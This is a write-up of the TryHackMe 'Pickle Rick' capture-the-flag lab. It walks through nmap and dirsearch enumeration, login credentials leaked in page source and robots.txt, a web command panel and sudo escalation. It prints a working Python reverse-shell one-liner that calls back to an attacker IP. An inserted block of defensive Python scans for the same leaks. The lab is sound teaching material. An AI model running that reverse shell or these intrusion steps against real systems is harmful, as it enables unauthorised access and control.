TryHackMe Pickle Rick Writeup

ex4
4 min read · Dec 21, 2021

Enumeration

First I used nmap to find what services/ports were open on the IP address

nmap -vv -T4 [IP Address]

Here we find that ports 22 and 80 are open

I then start an aggressive scan on the system to get more information

nmap -A [IP Address]

We get the OS (Ubuntu) and web server version (Apache/2.4.18) from this scan.

After scanning the ports/services of the system, we then try to find directories in the web server with dirsearch

Here we can see the directories of the web server.

Alright let’s now visit the site on a browser and try to get more info

Website

There is not really much information at first glance, but we see that we require a password to log on to Rick’s account

I then look at the source code (right click + view source code/inspect element) and find only the username, R1ckRul3s (sad)

Source code of the website

Let’s further enumerate into the web server by checking /assets/

/assets/

Luckily, directory indexing is on, so we are able to see the files in /assets/

Not really much info here, so let’s head on to /robots.txt/

/robots.txt/

A Google search reveals that the string in robots.txt is Rick’s catchphrase

(Sorry I don’t watch rick & morty)

Could it be the password?

Let’s head on to login.php and try logging in with R1ckRul3s as the username and Wubbalubbadubdub as the password

After logging in

It works!
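The two leaks used above (a username left in an HTML comment and a password sitting in robots.txt) are the kind of thing a pre-deployment check can catch. The following Python sketch is an added example, not part of the original writeup; the function names, the keyword list and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Directives crawlers understand; any other non-blank line in robots.txt
# is stray content that every visitor can read.
ROBOTS_DIRECTIVES = {"user-agent", "disallow", "allow", "sitemap", "crawl-delay"}
# Keywords suggesting a comment carries account details (assumed list).
SECRET_HINT = re.compile(r"\b(user(name)?|pass(word|wd)?|login|secret|token|key)\b", re.I)

# Constructed samples modelled on what the writeup describes.
SAMPLE_HTML = "<html><body><!-- layout: two columns --><!-- Username: R1ckRul3s --></body></html>"
SAMPLE_ROBOTS = "Wubbalubbadubdub\n"
GOOD_ROBOTS = "User-agent: *\nDisallow: /assets/  # static files\n"


class CommentCollector(HTMLParser):
    """Collects every <!-- ... --> comment in a page."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def risky_html_comments(html):
    """Return comments that mention credential-like keywords."""
    collector = CommentCollector()
    collector.feed(html)
    collector.close()
    return [c for c in collector.comments if SECRET_HINT.search(c)]


def stray_robots_lines(robots_txt):
    """Return robots.txt lines that are neither directives nor comments."""
    stray = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()  # ignore '#' comments
        if not line:
            continue
        field, sep, _ = line.partition(":")
        if not sep or field.strip().lower() not in ROBOTS_DIRECTIVES:
            stray.append(raw.strip())
    return stray


if __name__ == "__main__":
    print("HTML comments to review:", risky_html_comments(SAMPLE_HTML))
    print("Stray robots.txt lines:", stray_robots_lines(SAMPLE_ROBOTS))
```

Run against the rendered pages and robots.txt of a site before release, a non-empty result from either function is a reason to review what is being published.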

It seems like we can execute commands in this panel

Let’s try to list the contents of this directory /var/www/html

Listing the contents

We got one ingredient! And a clue! YAY

Let’s output the file

Failed Attempt 1

It doesn’t work…

Let’s try to get a reverse shell instead

Exploitation

With this link as my source, I decided to try a bash reverse shell

Well, that didn’t work, so I tried a python reverse shell instead

(Make sure to change the “python” to “python3” at the start of your command)

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_Address",4343));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

I accidentally terminated my machine, hence the machine IP is different

It worked!

We successfully found the first ingredient!

Let’s look at the clue (clue.txt) to get information on where the next ingredient is.

I decided to look at rick’s home directory as he had one

And we found it!

The quotation marks are needed to reference files with spaces in their names

Now for the last ingredient

There are some directories we cannot visit such as /root due to our permissions

(I totally forgot about sudo and had to seek help lol)

Let’s try to view /root with sudo

Let’s open the 3rd ingredient

And we are finally done!

From this challenge, I have learnt

How important enumeration is

How to use dirsearch

More on reverse shells

How important sudo is
